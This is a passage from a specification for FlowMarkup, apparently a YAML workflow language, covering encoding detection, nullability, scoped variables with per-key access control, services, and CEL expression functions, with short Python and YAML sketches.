Flow definition files MUST be UTF-8 (§2.1). However, text content loaded from external sources — RESOURCES files, `exec` stdout/stderr, HTTP response bodies, `decode()`/`parse()` input — may use any character encoding. The engine MUST perform best-effort encoding auto-detection for all text-based content types (TEXT, MARKDOWN, JSON, YAML, XML, CSV, TSV, and any MIME type with a `text/` prefix).

**Detection priority (highest to lowest):**

1. **`$charset` declaration** — on typedVar or requiresResourceEntry. When present, the engine MUST use the declared charset.
2. **Explicit MIME charset** — from HTTP `Content-Type` header or RESOURCES provider metadata (NOT from `$type`, which doesn't allow parameters). When present, the engine MUST use the declared charset.
3. **BOM (Byte Order Mark)** — The engine MUST recognize BOM sequences: UTF-8 (`EF BB BF`), UTF-16 BE (`FE FF`), UTF-16 LE (`FF FE`), UTF-32 BE (`00 00 FE FF`), UTF-32 LE (`FF FE 00 00`). The BOM is consumed and not included in the decoded text.
4. **Heuristic detection** — When no explicit charset or BOM is present, the engine SHOULD apply statistical character encoding detection (e.g., ICU `CharsetDetector` or equivalent). Common encodings to detect: UTF-8, ISO-8859-1 (Latin-1), Windows-1252, Shift_JIS, EUC-JP, EUC-KR, GB2312/GBK, Big5.
5. **Fallback** — If heuristic detection fails or returns low confidence, the engine MUST fall back to UTF-8. Invalid byte sequences under the detected encoding SHOULD raise `ParseError` rather than silently replacing characters.
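
The priority order above can be sketched in Python as follows. `decode_text` and the local `ParseError` class are hypothetical. Heuristic detection (step 4) is omitted, and the sketch does not address whether a BOM is stripped when a charset is declared explicitly. The BOM table is ordered longest first because the UTF-32 LE mark begins with the same two bytes as the UTF-16 LE mark.

```python
class ParseError(Exception):
    """Stand-in for the engine's ParseError."""


# Longest BOMs first so UTF-32 LE is not mistaken for UTF-16 LE.
BOMS = [
    (b"\x00\x00\xfe\xff", "utf-32-be"),
    (b"\xff\xfe\x00\x00", "utf-32-le"),
    (b"\xef\xbb\xbf", "utf-8"),
    (b"\xfe\xff", "utf-16-be"),
    (b"\xff\xfe", "utf-16-le"),
]


def decode_text(data, declared_charset=None, mime_charset=None):
    """Decode bytes using priorities 1, 2, 3 and 5 from the list above."""
    encoding = declared_charset or mime_charset       # steps 1 and 2
    if encoding is None:
        for bom, name in BOMS:                        # step 3
            if data.startswith(bom):
                encoding, data = name, data[len(bom):]  # BOM is consumed
                break
    if encoding is None:
        encoding = "utf-8"                            # step 5 fallback
    try:
        return data.decode(encoding)                  # strict: no replacement chars
    except (UnicodeDecodeError, LookupError) as exc:
        raise ParseError(f"cannot decode content as {encoding}") from exc
```

Strict decoding matches the recommendation to raise `ParseError` on invalid byte sequences instead of silently substituting characters.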

The engine normalizes all decoded text content to its internal string representation (e.g., UTF-16 in Java/C#, UTF-8 in Go/Rust). The original bytes SHOULD be cached alongside the decoded text for source-format serialization fidelity at binary-native boundaries (see Value Projection).

This applies uniformly to all text-based formats — not just CSV/TSV. A JSON file saved in Shift_JIS, a YAML file in Latin-1, or a plain TEXT resource in Windows-1252 are all decoded correctly through the same pipeline.

#### Format-Validated String Subtypes

| Constant | Description |
|---|---|
| `URI` | Any URI (RFC 3986) |
| `URL` | HTTP/HTTPS URL |
| `EMAIL` | Email address |
| `FILENAME` | Safe filename (no path separators) |
| `IP` | IPv4 or IPv6 address |
| `UUID` | UUID (any variant/version) |

Format-validated subtypes are usable wherever `$kind` is expected. They expand to `STRING` with a built-in format constraint:

```yaml
# These two declarations are equivalent:
recipient: EMAIL
recipient: { $kind: STRING, $format: "^[^@]+@[^@]+$" }  # (simplified — actual regex per RFC 5322)
```

Format validation fires on assignment. Failed validation raises `ValidationError`.
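
A possible shape for assignment-time validation is sketched below in Python for three of the subtypes. The checks are approximations chosen for illustration (for example, `uuid.UUID` accepts more textual forms than a strict validator might), and `validate_format` is a hypothetical name.

```python
import ipaddress
import uuid


class ValidationError(Exception):
    """Stand-in for the engine's ValidationError."""


def _check_filename(value):
    # "Safe filename": non-empty and free of path separators.
    if not value or "/" in value or "\\" in value:
        raise ValueError("path separator in filename")


CHECKS = {
    "IP": ipaddress.ip_address,   # accepts IPv4 and IPv6 text
    "UUID": uuid.UUID,            # any variant/version
    "FILENAME": _check_filename,
}


def validate_format(kind, value):
    """Validate a string against a format subtype; return it unchanged if valid."""
    check = CHECKS.get(kind)
    if check is None:
        raise NotImplementedError(f"no validator sketched for {kind}")
    try:
        check(value)
    except ValueError as exc:
        raise ValidationError(f"{value!r} is not a valid {kind}") from exc
    return value
```

An engine would call such a validator on every write to the variable, not only on initialization, since validation fires on assignment.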

#### Nullability

| Context | Auto-derived nullability |
|---|---|
| `vars: { x: null }` | nullable |
| `vars: { x: 0 }` | not nullable |
| `typedVar` with `$value: null` | nullable |
| `typedVar` with `$value: <non-null>` | not nullable |
| `const:` | never nullable |
| `input.required` without `$default:` | not nullable |
| `input.required` with `$default: null` | nullable |
| `input.optional` without `$default:` | nullable |

Explicit `$nullable: true/false` overrides auto-derivation. Assigning `null` to a non-nullable variable raises `ValidationError`. See SA-NULL-1, SA-NULL-2.

**Mutual implication rules — either form is sufficient, both together are redundant:**

- `$default: null` implies `$nullable: true`. A param that defaults to `null` is inherently nullable.
- `$nullable: true` on an input param without `$default:` implies `$default: null` — the param becomes optional and defaults to `null` when not provided.
- `$nullable: true` on a `vars:`/`set:` declaration without `$value:` implies `$value: null`.

These rules mean `{$nullable: true, $default: null}` is equivalent to just `{$nullable: true}` or just `{$default: null}` — use whichever communicates intent more clearly. SA-NULL-3 (INFO) warns when both are specified redundantly.

> **Nullability recommendation:** Flow authors SHOULD declare nullability explicitly on all input parameters and variables that may hold `null` at runtime. Relying solely on auto-derivation (from `$default: null` or `$value: null`) obscures intent and makes flows harder to review. When a parameter is intentionally non-nullable, omitting `$nullable` is sufficient — but adding `$nullable: false` as an explicit assertion is acceptable for documentation purposes and does not trigger SA-NULL-3.

> **Required but nullable:** To declare an input parameter that the caller must explicitly provide but may pass as `null`, use the structured `required:` form: `required: { x: { $kind: STRING, $nullable: true } }`. The `required:` placement makes the parameter mandatory; `$nullable: true` permits `null` as an explicit value without implying `$default: null`.
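
The implication rules for input parameters, together with the `required:` exception, can be sketched as a normalisation pass in Python. `normalize_param` and its `in_required_section` flag are hypothetical names; the sketch leaves an explicit `$nullable` untouched because explicit values override auto-derivation.

```python
_MISSING = object()  # distinguishes "no $default key" from "$default: null"


def normalize_param(defn, in_required_section=False):
    """Apply the mutual implication rules to one input parameter definition."""
    out = dict(defn)
    default = out.get("$default", _MISSING)
    if default is None:
        # $default: null implies $nullable: true (unless stated explicitly)
        out.setdefault("$nullable", True)
    elif default is _MISSING and out.get("$nullable") is True:
        if not in_required_section:
            # $nullable: true without $default implies $default: null
            out["$default"] = None
        # Under required:, the caller must still pass the value explicitly.
    return out
```

After normalisation, `{$default: null}` and `{$nullable: true}` produce the same definition, while a `required:` entry with `$nullable: true` keeps no default.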

### 2.5 Data Element Scopes

| Prefix | Scope | Mutability | Example |
|---|---|---|---|
| *(none)* or `LOCAL.` | Flow-local | read/write | `counter`, `LOCAL.counter` |
| `CONTEXT.` | Execution chain | read/write | `CONTEXT.correlation_id` |
| `GLOBAL.` | Global (per-tenant) | read/write | `GLOBAL.request_count` |
| `ENV.` | Environment | **read-only** | `ENV.API_KEY` |
| `SECRET.` | Secrets provider | **read-only, opaque** | `SECRET.api_token` |
| `RUNTIME.` | Runtime metadata | **read-only** | `RUNTIME.OS.NAME` |

**Flow-local (`LOCAL.`):** `LOCAL.counter` and `counter` refer to the same variable.

**Context (`CONTEXT.`):** Shared across root flow + all transitive sub-flows. Per-key access control (aligned with GLOBAL model). Flows MUST declare which CONTEXT keys they access in `requires: { CONTEXT: [...] }` (SA-CTX-1, ERROR). Accessing an undeclared key raises `MissingCapabilityError`. `async: true` sub-flows receive a **deep clone** of declared `CONTEXT.*` keys at invocation time (changes not back-propagated). `GLOBAL.*` is NOT snapshotted — async sub-flows read/write the live global store. `ENV.*`, `SECRET.*`, and `RUNTIME.*` are always live references.

Omitting `CONTEXT:` from `requires:` means no CONTEXT keys are accessible (the default is no access).

**CONTEXT per-key access control:** `requires: { CONTEXT: [key1, key2] }` grants read-write on the listed keys. `requires: { CONTEXT: { read: [key1], write: [key2] } }` provides separate per-key read and write lists. SA-CTX-2 (ERROR) rejects writes to keys not in the write list when the object form is used. SA-CTX-3 (WARN) warns on read-modify-write patterns without `lock:`. Sub-flow CONTEXT propagation: parent's `cap:` can further restrict CONTEXT keys passed to the sub-flow. SA-RUN-8 flags async sub-flows that declare CONTEXT write keys, because those writes will be lost (deep clone, not shared).

**Global (`GLOBAL.`):** Shared across all flow instances within the same tenant. Individual writes are atomic; multi-step read-modify-write is NOT transactional (last-writer-wins). The engine MUST enforce tenant isolation. Flows that reference `GLOBAL.*` MUST declare per-key access in `requires: { GLOBAL: [...] }` (SA-GLOBAL-1, ERROR).

**Per-key access control (GLOBAL and CONTEXT):** When `requires: { GLOBAL: [key1, key2] }` is declared, the engine MUST restrict the flow's GLOBAL access to only those keys (both read and write). Accessing an undeclared key raises `MissingCapabilityError`. The per-key array form grants `READ_WRITE` on the listed keys. Object form `{ read: [...], write: [...] }` provides separate per-key read and write lists. The same model applies to CONTEXT.
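
A minimal Python sketch of how an engine might interpret the two declaration forms is shown below. The helper names are hypothetical, and the sketch treats the `read` and `write` lists as independent, which is an assumption (the text does not say whether write access implies read access).

```python
class MissingCapabilityError(Exception):
    """Stand-in for the engine's MissingCapabilityError."""


def parse_key_access(decl):
    """Return (readable, writable) key sets from a GLOBAL or CONTEXT entry."""
    if isinstance(decl, dict):                 # { read: [...], write: [...] }
        return set(decl.get("read", [])), set(decl.get("write", []))
    keys = set(decl or [])                     # [key1, key2] grants READ_WRITE
    return keys, set(keys)


def check_access(decl, key, mode):
    """Raise MissingCapabilityError unless `key` is declared for `mode`."""
    readable, writable = parse_key_access(decl)
    allowed = readable if mode == "read" else writable
    if key not in allowed:
        raise MissingCapabilityError(f"{mode} access to {key!r} is not declared")
```

Omitting the entry altogether yields two empty sets, so every access fails, which matches the default of no access.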

**Single-step read-modify-write on `GLOBAL.*` is automatically atomic.** The engine uses transparent OCC retry to ensure that `GLOBAL.x: =GLOBAL.x + 1` in a single `set:` step executes correctly under concurrent access. No explicit `lock:` is needed for single-step patterns. **Multi-step patterns on `GLOBAL.*` require explicit `lock:`.** If you read a GLOBAL key in one step and write it in another, use `lock:` to prevent interleaving. The same per-step atomicity applies to `CONTEXT.*` and `LOCAL.*` (within concurrent branches).

> **OCC retry limit.** The engine MUST enforce a configurable per-step OCC retry limit for GLOBAL.* read-modify-write (default: 100, maximum: 1,000). When retries are exhausted, the engine MUST raise `ConflictError`. Under high contention, flow authors SHOULD use explicit `lock:` instead of relying on OCC. *(CWE-400)*
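
The retry behaviour can be sketched in Python with a toy versioned store. `VersionedStore` and `atomic_update` are hypothetical, the store is in-memory and not thread-safe, and counting one initial attempt plus `retry_limit` retries is an assumption about how the limit is applied.

```python
class ConflictError(Exception):
    """Stand-in for the engine's ConflictError."""


class VersionedStore:
    """Toy store: each key maps to a (version, value) pair."""

    def __init__(self):
        self._data = {}

    def read(self, key):
        return self._data.get(key, (0, None))

    def compare_and_set(self, key, expected_version, value):
        """Write only if nobody else has written since `expected_version`."""
        version, _ = self.read(key)
        if version != expected_version:
            return False
        self._data[key] = (version + 1, value)
        return True


def atomic_update(store, key, fn, retry_limit=100):
    """Optimistic read-modify-write: re-read and retry on version conflict."""
    for _ in range(retry_limit + 1):
        version, value = store.read(key)
        if store.compare_and_set(key, version, fn(value)):
            return
    raise ConflictError(f"OCC retries exhausted for {key!r}")
```

A single-step increment such as `GLOBAL.x: =GLOBAL.x + 1` corresponds to one `atomic_update` call; a read in one step and a write in another falls outside this loop, which is why the multi-step case needs `lock:`.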

> **GLOBAL value limits.** The engine MUST enforce a configurable per-value size limit for `GLOBAL.*` values (default: 1 MB, configurable maximum: 10 MB). Values exceeding the limit MUST be rejected with `ResourceExhaustedError`. The engine MUST enforce a configurable per-tenant total `GLOBAL.*` storage limit (default: 100 MB). By default, the engine MUST NOT allow `GLOBAL.*` values to persist indefinitely: engines MUST support a configurable default TTL (default: 24 hours; `0` means no expiration). In high-security mode, the engine MUST audit-log all `GLOBAL.*` write operations including the flow instance ID, key name, value size, and operation type (set/delete). *(CWE-400, CWE-778)*

**Environment (`ENV.`):** Read-only. Missing variables evaluate to `null`.

**Secret (`SECRET.`):** Read-only, opaque `SecretValue` handles. Cannot be inspected, compared, or concatenated. Resolved only at action boundaries. Requires `SECRET` capability.

**Runtime (`RUNTIME.`):** Read-only, engine-populated. Structure: `RUNTIME.OS.{NAME,VERSION,ARCH}`, `RUNTIME.ENGINE.{NAME,VENDOR,VERSION}`, `RUNTIME.PLATFORM.{NAME,VERSION}`. Requires `requires: { RUNTIME: true }` (SA-RT-1). Any write is a hard error (SA-RT-2).

- `RUNTIME.ASYNC_SECURITY_ERRORS`: INTEGER (read-only) — Count of security-class errors (`MissingCapabilityError`, `SecretAccessError`, `AuthenticationError`, `AccessDeniedError`) from async sub-flows of this flow instance. Monotonically increasing. Requires: `RUNTIME` capability.

**Resources (`RESOURCES`):** `map(string, Resource | null)` of content-centric resource handles. Resources are opaque handles. Access metadata via the `meta()` macro: `meta(RESOURCES.config).name`, `meta(RESOURCES.config).size`. Lazy content: `meta(RESOURCES.config).value`. The engine SHOULD load resource content atomically (read once, cache in memory). When `meta(resource).value` is first accessed, the engine reads the file and caches the result for the flow instance duration. Subsequent `.value` accesses return the cached content. For `exec` steps, resource references auto-map to their filesystem path. Requires `requires: { RESOURCES: ... }`. Read-only (SA-RES-2). SA-RES-1 warns on undeclared access. File extension inference:

| Extension | Inferred Kind |
|---|---|
| `.json` | JSON (MAP) |
| `.yaml`, `.yml` | YAML (MAP) |
| `.csv` | CSV (ARRAY) |
| `.tsv` | TSV (ARRAY) |
| `.xml` | XML (MAP) |
| `.txt` | TEXT |
| `.md` | MARKDOWN |

When `meta(resource).value` is accessed on a text-based resource, the engine applies character encoding detection (see §2.4 Character Encoding Detection) before format-specific parsing. `$charset` on a requiresResourceEntry declaration provides the highest-priority charset override for that resource's content.

**Reserved prefixes:** `GLOBAL.`, `CONTEXT.`, `LOCAL.`, `RUNTIME.`, `ENV.`, `SECRET.` are reserved. Flow-local names MUST NOT start with reserved prefixes (except `LOCAL.`).

### 2.6 Flow-Level Services (`services:`)

```yaml
services:
  db:
    provider: progralink.clients.db.postgres    # static, NOT CEL
    properties:
      host: =ENV.DB_HOST
      port: 5432
      password: =SECRET.db_password
```

`provider:` is a static string (same carve-out as `exec.command:`, `throw.error:`). Provider IDs are reverse-DNS dot-namespaced strings.

`properties:` values are evaluated as CEL on first invocation of any operation on that service within the flow instance. Once evaluated, property values are cached for the flow instance's lifetime. Only `ENV.*`, `SECRET.*`, and plain literals are in scope (SA-SVC-4).

Alias keys MUST match `^[a-z][a-z0-9_]*$`.

**`SERVICES.<alias>.meta`** -- read-only CEL map with standard keys: `meta.provider`, `meta.type`, `meta.version`, `meta.operations`. Writing to `SERVICES.*` is a static analysis error (SA-SVC-8).

**`requires.SERVICES`** -- typed object form declares protocol and operations:
```yaml
requires:
  SERVICES:
    db:
      provider: progralink.clients.db.sql
      operations: [query, scalar]
```

**`cap.SERVICES`** -- supports object form for alias remapping on `run`:
```yaml
cap:
  SERVICES:
    db: =SERVICES.analytics_db
```

### 2.7 Expressions

#### The `=` Expression Prefix

| Value | Syntax | Example |
|---|---|---|
| CEL expression | `=<expr>` | `condition: =score > 0.8` |
| String literal | plain scalar | `status: pending` |
| Template string | `"text {{expr}} text"` | `log: "Processing {{order.id}}"` |
| YAML native type | unquoted YAML | `count: 0`, `active: true` |

Quotes go **outside** `=` -- they are YAML syntax, not part of the expression.
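
A short sketch of the four value forms side by side, including the quoting rule. The variables `score` and `order` are hypothetical.

```yaml
- set:
    status: pending                          # plain string literal
    attempts: 0                              # YAML native integer
    is_priority: =score > 0.8                # CEL expression, no quotes needed
    summary: "Order {{order.id}} received"   # template string
    # This expression contains ": ", which YAML does not allow inside a
    # plain scalar, so the whole value is quoted. The quotes wrap the "=" too.
    label: "=order.id + ': ' + order.region"
```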

#### Expression Context Properties

| Category | Properties |
|---|---|
| Boolean guards | `if.condition`, `while.condition`, `break.condition`, `continue.condition`, `catch[].condition`, action `condition`, `branches.<name>.condition` |
| Iterables | `forEach.items` |
| Repeat condition | `repeat.until`, `forEach.completionCondition` |
| Switch value | `switch.value` |
| Assert | `assert` (shorthand), `assert.condition`, `assert.message` |
| Return | `return` (shorthand), `return.*` (object values) |
| Yield | `yield` (shorthand), `yield.*` (object values) |
| Log | `log` (shorthand), `log.message` |
| Throw | `throw.message`, `throw.data.*` (values) |
| Set | `set.*` (values) |
| Input | `input.*` (values) |
| Service | `call.service`, `call.operation` |
| Scope | `emit.scope`, `waitFor.scope`, `lock.scope` (when dynamic) |
| Wait | `wait` (string form), `wait.duration` |
| Wait-until | `waitUntil` (shorthand), `waitUntil.timestamp` |
| Lock name | `lock.name` |
| Enum fields | `group.mode`, `log.level`, `lock.mode`, `retry.backoff`, `request.method` |
| Request | `request.url`, `request.host`, `request.path`, `request.query.*`, `request.headers.*`, `request.auth.*`, `request.body.*` |
| Typed var sentinels | `$kind`, `$type`, `$format`, `$encoding`, `$name`, `$value` (YAML declaration keys, not CEL accessors) |
| Vars/const init | `vars.*` / `const.*` string values |

#### Static Properties (Never CEL)

| Category | Properties |
|---|---|
| Flow metadata | `flow.title`, `flow.documentation`, `flow.version` |
| Step metadata | `*._label_`, `*._notes_`, `*._meta_`, `*._id_` |
| Duration literals | `timeout` (when matching `^\d+(ms\|[smhd])$`) |
| Sub-flow refs | `run.flow`, `run.integrity`, `run.cap` |
| Error types | `throw.error`, `catch` map keys |
| Variable binding names | `forEach.as`, `forEach.index`, `set` keys, `return` keys, `vars` keys |
| Match values | `switch.match` keys |
| Declaration metadata | `paramDef.$kind`, `paramDef._notes_`, `paramDef.$default`, etc. |
| Service definition | `services.<alias>.provider` |
| Exec command | `exec.command` |
| Event types | `emit.event`, `waitFor.event` |

#### String Template Interpolation (`{{ }}`)

String values (no `=` prefix) support `{{ expr }}` interpolation. Any CEL expression inside `{{ }}` is evaluated and auto-coerced to string. Template interpolation is single-pass: if a resolved value contains `{{ }}` sequences, they are treated as literal text, not re-evaluated. This prevents template injection via user-controlled data. Prohibited on `=`-prefixed fields (SA-INTERP-1). `{{SECRET.key}}` is SA-SECRET-20 (hard error). Escape literal `{{` with `\{{`.
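
A minimal sketch of interpolation and escaping, assuming a hypothetical `order` variable. The second step is single-quoted because `\{` is not a valid escape sequence inside a YAML double-quoted string.

```yaml
- log: "Processing order {{order.id}} with {{order.items.size()}} items"
# Single quotes keep the backslash intact; \{{ yields a literal "{{".
- log: 'Template syntax is \{{expr}}; current id is {{order.id}}'
```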

#### Duration/Timeout Disambiguation

- **Integer** -> milliseconds
- **String matching `^\d+(ms|[smhd])$`** -> duration literal
- **`=`-prefixed string** -> CEL expression

Engines SHOULD reject duration values exceeding a configurable maximum (recommended default: 365d). Durations in the millions-of-days range are likely authoring errors.
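
The three forms can be compared on `wait.duration`, assuming that property accepts all of them; `retry_delay` is a hypothetical variable.

```yaml
- wait: { duration: 1500 }           # integer: 1500 milliseconds
- wait: { duration: 30s }            # duration literal: 30 seconds
- wait: { duration: =retry_delay }   # CEL expression, evaluated at runtime
```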

#### Nested Objects in Expression Contexts

In `set.*`, `input.*`, `throw.data.*`, `return.*`, the engine recursively evaluates `=`-prefixed strings inside nested objects. Non-strings and plain strings pass through. When a resolved value is a typed variable, the engine projects (unwraps) the raw value, stripping all metadata. Binary (`byte[]`) values within serialized objects/arrays are auto-encoded as base64 strings.
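
For example, in the following sketch only the `=`-prefixed strings are evaluated, at whatever depth they appear. The `order` variable and its fields are hypothetical.

```yaml
- return:
    order:
      id: =order.id                     # evaluated as CEL
      status: shipped                   # plain string passes through
      attempts: 3                       # non-string passes through
      totals:
        gross: =order.net + order.tax   # evaluated inside the nested object
        currency: EUR
```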

#### Expression Engine

**Recommended: Google Common Expression Language (CEL).** CEL is sandboxed by design (non-Turing complete, no I/O, no side effects).

FlowMarkup targets CEL specification v0.15 ([github.com/google/cel-spec](https://github.com/google/cel-spec)). Library versions in [FLOWMARKUP-ENGINE-CROSSLANG.md](FLOWMARKUP-ENGINE-CROSSLANG.md) CL-5 are tested against this specification version.

> **Implementation maturity:** Not all target languages have production-ready CEL and YAML 1.2 libraries. Rust and C# have known ecosystem gaps — see [FLOWMARKUP-ENGINE-CROSSLANG.md](FLOWMARKUP-ENGINE-CROSSLANG.md) CL-5 and CL-6 for current library status and recommended mitigations.

**Host-language introspection MUST be blocked.** The engine MUST NOT expose reflection, meta-methods, or prototype chain access through CEL. Enforcement MUST use explicit allowlists, never auto-exposure.

#### Built-in CEL Bindings

| Identifier | Type | Description |
|---|---|---|
| `GLOBAL` | `map(string, dyn)` | Global variables. Read/write. |
| `CONTEXT` | `map(string, dyn)` | Execution-chain variables. Read/write. |
| `LOCAL` | `map(string, dyn)` | Flow-local scope as explicit map. |
| `ENV` | `map(string, string)` | OS environment. Read-only. |
| `SERVICES` | `map(string, ServiceHandle)` | Service registry. Read-only (SA-SVC-8). |
| `ERROR` | `map(string, dyn)` | Caught error (in `catch` blocks). Fields: `TYPE`, `MESSAGE`, `STEP`, `DATA`, `CAUSE`. |
| `EVENT` | `map(string, dyn)` | Current event (in `waitFor`/triggers). Fields: `TYPE`, `DATA`, `SOURCE` (SA-EVENT-8). |
| `SECRET` | `map(string, SecretValue)` | Secrets. Read-only, opaque. |
| `RUNTIME` | `map(string, map(string, string))` | Runtime metadata. Read-only. Requires capability. |
| `RESULT` | `map(string, dyn)` | Action return value (in `result:` expressions). Always refers to the step's own action result, not any inline service call sub-expressions within `params:`. |
| `RESOURCES` | `map(string, Resource \| null)` | Resource handles. Read-only. Requires capability. Access metadata via `meta()` macro (§2.5). |
| `YIELD` | `map(string, dyn)` | Current yielded element (in `onYield.do:`). Fields: `VALUE`, `INDEX`. |
| `MIGRATION` | `map(string, dyn)` | Version migration context (in `onVersionChange:`). |
| `RESULTS` | `list(map(string, dyn))` | Concurrent `forEach` only. Thread-safe accumulation array. Each completed iteration appends its result map. Available inside `completionCondition` and after the `forEach` completes. Read-only outside the engine's append logic. The `RESULTS` array size is bounded by `maxItems` and subject to per-instance memory limits. **Ordering:** Elements appear in completion order (non-deterministic for `PARALLEL` mode). Flow authors MUST NOT rely on `RESULTS` element ordering matching the input collection order; use `RESULTS[i].INDEX` to correlate results with their source items when ordering matters. For `SEQUENCE` mode, completion order matches input order. |
| Mode constants | `string` | `SEQUENCE`, `PARALLEL`, `RACE` |
| Level constants | `string` | `TRACE`, `DEBUG`, `INFO`, `WARN`, `ERROR` |
| Lock constants | `string` | `SHARED`, `EXCLUSIVE` |
| Backoff constants | `string` | `FIXED`, `LINEAR`, `EXPONENTIAL` |
| HTTP constants | `string` | `GET`, `POST`, `PUT`, `DELETE`, `PATCH`, `HEAD`, `OPTIONS` |
| Scope constants | `string` | `LOCAL`, `CONTEXT`, `GLOBAL` |
| `meta` | macro | `meta(variable)` returns metadata MAP for a typed variable. Keys: `type`, `kind`, `name`, `size` (RESOURCES only), `value` (RESOURCES only). For `SECRET.*` bindings: returns `{type: null, kind: <$kind>, name: null, readonly: true}`; `value` and `size` are always `null`. When `meta()` is called on a `SECRET.*` binding, the `name` field MUST be redacted — the engine MUST return `null` for the `name` field to prevent secret alias enumeration. *(CWE-200)* |

Mode constants are both CEL variable bindings and enum string values. `=mode == PARALLEL` and `=mode == "PARALLEL"` are equivalent. The engine pre-binds each constant to its string value.

**Auto-stringification in concatenation:** When one operand of `+` is a string, a non-string operand (number, boolean, or `null`) is auto-coerced to its string form. `SecretValue` is never coerced.

**Null semantics:** Property access (`.field`), method calls (`.size()`), and indexing (`[0]`) on `null` raise `ValidationError` — this follows standard CEL semantics. The auto-stringification exception above applies: `null` in `+` concatenation coerces to `"null"` string, but `null.field` in any context throws. For collections, `[].first()` returns `null` (safe), but `null.first()` throws (unsafe). Recommended null-safe patterns:

- Ternary: `=x != null ? x.field : fallback`
- `has()` macro: `=has(map.key)` for map field existence
- `condition:` guard: use `condition: =x != null` on the step, or wrap in a parent `if:`
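
The three patterns above can be sketched as follows, assuming hypothetical `customer` and `order` variables.

```yaml
- set:
    # Ternary guard: customer is never dereferenced when it is null.
    city: "=customer != null ? customer.city : 'unknown'"
    # has() checks map field existence before the field is read.
    coupon: "=has(order.coupon) ? order.coupon : ''"
# Parent if: guard around steps that dereference customer.
- if:
    condition: =customer != null
    then:
    - log: "Shipping to {{customer.city}}"
```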

#### String Methods

| Method | Returns | Description |
|---|---|---|
| `s.contains(sub)` | bool | Substring check |
| `s.startsWith(prefix)` | bool | Prefix check |
| `s.endsWith(suffix)` | bool | Suffix check |
| `s.matches(regex)` | bool | Regex match |
| `s.size()` | int | Length (`size()`, NOT `length()`) |
| `s.split(sep)` | list | Split by separator |
| `s.replace(old, new)` | string | Replace substring |
| `s.trim()` | string | Trim whitespace |
| `s.upperAscii()` | string | Uppercase |
| `s.lowerAscii()` | string | Lowercase |
| `s.indexOf(sub)` | int | Index of substring (-1 if absent) |
| `s.substring(start[, end])` | string | Substring extraction |

#### Collection Macros (Standard CEL)

| Macro | Description |
|---|---|
| `list.filter(x, pred)` | Elements where predicate is true |
| `list.map(x, expr)` | Transform each element |
| `list.exists(x, pred)` | True if any matches |
| `list.all(x, pred)` | True if all match |
| `list.exists_one(x, pred)` | True if exactly one matches |

#### FlowMarkup Collection Extensions

##### List Extensions

| Function | Kind | Description |
|---|---|---|
| `list.sortBy(x, expr)` | macro | Sort ascending by key |
| `list.sortByDesc(x, expr)` | macro | Sort descending by key |
| `list.flatMap(x, expr)` | macro | Map then flatten one level |
| `list.first()` | function | First element or null |
| `list.first(n)` | function | First n elements |
| `list.first(x, pred)` | macro | First matching element or null |
| `list.last()` / `list.last(n)` / `list.last(x, pred)` | mixed | Analogous to `first` |
| `list.skip(n)` | function | Skip first n elements |
| `list.distinct()` | function | Remove duplicates |
| `list.distinctBy(x, expr)` | macro | Remove duplicates by key |
| `list.flatten()` | function | Flatten one level |
| `list.reverse()` | function | Reverse order |
| `list.groupBy(x, expr)` | macro | Group into `{key: [items]}`. The group key expression MUST evaluate to a string. Non-string results are coerced to their string representation. |
| `list.reduce(acc, x, init, expr)` | macro | Left fold. Example: `=items.reduce(total, item, 0, total + item.amount)` — accumulates `amount` across all items starting from 0. |
| `list.chunk(n)` | function | Split into sub-lists |
| `list.zip(other)` | function | Pair elements |
| `list.indexOf(val)` | function | Index of first occurrence |
| `list.join(sep)` | function | Join with separator |
| `list.sum()` / `list.avg()` / `list.min()` / `list.max()` | function | Aggregation |
| `list.minBy(x, expr)` / `list.maxBy(x, expr)` | macro | Element with min/max key |
| `list.count(x, pred)` | macro | Count matching elements |

**Empty collection semantics:** `[].first()` -> `null`, `[].sum()` -> `0`, `[].min()` -> `null`, `[].avg()` -> `null`.
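
A few of these extensions combined in one step, as a sketch over a hypothetical `orders` list whose elements have `total` and `status` fields.

```yaml
- set:
    top_three: "=orders.sortByDesc(o, o.total).first(3)"
    by_status: "=orders.groupBy(o, o.status)"
    revenue: "=orders.map(o, o.total).sum()"
    # first(x, pred) yields null when nothing matches, so downstream
    # steps should guard before dereferencing first_paid.
    first_paid: "=orders.first(o, o.status == 'paid')"
```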

##### Map Extensions

| Function | Kind | Description |
|---|---|---|
| `map.keys()` / `map.values()` / `map.entries()` | function | Key/value/entry access |
| `map.merge(other)` | function | Merge (right wins) |
| `map.filterKeys(k, pred)` / `map.filterValues(v, pred)` | macro | Filter entries |
| `map.mapValues(v, expr)` | macro | Transform values |

##### Utility Functions

| Function | Description |
|---|---|
| `range(n)` / `range(start, end)` | Generate integer list |

#### Encoding, Decoding, and Parsing Functions

| Function | Description |
|---|---|
| `bytes.encode(BASE64\|BASE64URL\|HEX)` | Bytes -> encoded string |
| `string.encode(UTF8\|UTF16*)` | String -> bytes |
| `value.encode(JSON\|YAML\|CSV\|TSV\|XML)` | Serialize value -> string. Result carries `$type` metadata matching the format: `CSV` → `text/csv`, `TSV` → `text/tab-separated-values`, `JSON` → `application/json`, `YAML` → `application/yaml`, `XML` → `application/xml`. This means the result can be used at binary-native boundaries (HTTP body, multipart, mail attachment) without specifying `contentType:` explicitly. |
| `string.decode(BASE64\|HEX\|JSON\|YAML\|CSV\|TSV\|XML)` | Encoded string -> value |
| `bytes.decode(UTF8\|UTF16*)` | Bytes -> string |

`value.parse(FORMAT)` is an alias for `value.decode(FORMAT)`.

Errors: `EncodeError`, `ParseError`.
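
The functions compose as ordinary method calls. The sketch below assumes hypothetical variables `order` (a MAP), `raw_body` (a JSON string), and `token` (a string).

```yaml
- set:
    payload_json: "=order.encode(JSON)"     # MAP -> JSON string
    parsed: "=raw_body.decode(JSON)"        # JSON string -> value
    # String -> bytes -> Base64 string, chaining the two encode() forms.
    token_b64: "=token.encode(UTF8).encode(BASE64)"
```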

**XML encode/decode constraints:**

- `encode(XML)` only accepts MAP input. ARRAY input raises `EncodeError` (XML requires a root element). The MAP must have exactly one top-level key (the root element name). Zero or multiple keys raise `EncodeError`. Produces an XML string with `<?xml version="1.0" encoding="UTF-8"?>` declaration.

  ```yaml
  # Valid — one top-level key:
  - set: { xml: '={order: {id: "123", total: 99.99}}.encode(XML)' }

  # EncodeError — two top-level keys (wrap in a root element):
  # ={id: "123", total: 99.99}.encode(XML)
  # Fix: ={order: {id: "123", total: 99.99}}.encode(XML)
  ```
- `decode(XML)` / `parse(XML)` parses XML string into MAP using the XML-to-MAP mapping convention (§1.3). All element text values are STRING (no number/boolean coercion). Malformed XML raises `ParseError`.

